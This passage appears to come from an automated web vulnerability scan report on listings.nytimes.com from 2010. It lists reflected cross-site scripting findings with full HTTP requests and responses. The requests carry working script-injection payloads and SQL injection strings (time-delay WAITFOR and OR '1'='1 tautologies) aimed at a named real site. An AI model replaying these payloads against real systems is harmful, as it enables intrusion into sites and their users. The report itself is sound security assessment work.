The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40d1930<script>alert(1)</script>4940575c8d1c8304a&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=3&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=3&SubCatId=3&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=JDIPGLGAGKINHNJPBNGFIHLA
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 15:22:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAAQRRAR=ALBIDCKANHANJOKAIJIAIBAJ; path=/
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>AdTagCountyId=1;WAITFOR%20DELAY%20%270:0:25%27--&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40d1930<script>alert(1)</script>4940575c8d1c8304a&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2
...[SNIP]...

4.206. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Lid request parameter is copied into the HTML document as plain text between tags. The payload 1e5bc<script>alert(1)</script>7b1314480f247f531 was submitted in the Lid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=31e5bc<script>alert(1)</script>7b1314480f247f531&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:38:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 552
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=31e5bc<script>alert(1)</script>7b1314480f247f531&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEm
...[SNIP]...

4.207. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Lid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Lid request parameter is copied into the HTML document as plain text between tags. The payload a9d9e<script>alert(1)</script>beb9a323e94 was submitted in the Lid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3a9d9e<script>alert(1)</script>beb9a323e94&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserE
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 465
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3a9d9e<script>alert(1)</script>beb9a323e94&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEm
...[SNIP]...

4.208. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [NOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the NOrder request parameter is copied into the HTML document as plain text between tags. The payload 1c74d<script>alert(1)</script>4648c21ee73 was submitted in the NOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A1c74d<script>alert(1)</script>4648c21ee73&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsI
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:24:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A1c74d<script>alert(1)</script>4648c21ee73&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsId
...[SNIP]...

4.209. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [NOrder parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the NOrder request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 896f9"><script>alert(1)</script>6bea79338d2a3da2d was submitted in the NOrder parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A896f9"><script>alert(1)</script>6bea79338d2a3da2d&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 91508
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSABRQSAS=CHLKNADAHILJJBOCIHJCOMJH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="NOrder" value="A896f9"><script>alert(1)</script>6bea79338d2a3da2d">
...[SNIP]...

4.210. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [Order parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the Order request parameter is copied into the HTML document as plain text between tags. The payload 99438<script>alert(1)</script>f49b8802311 was submitted in the Order parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

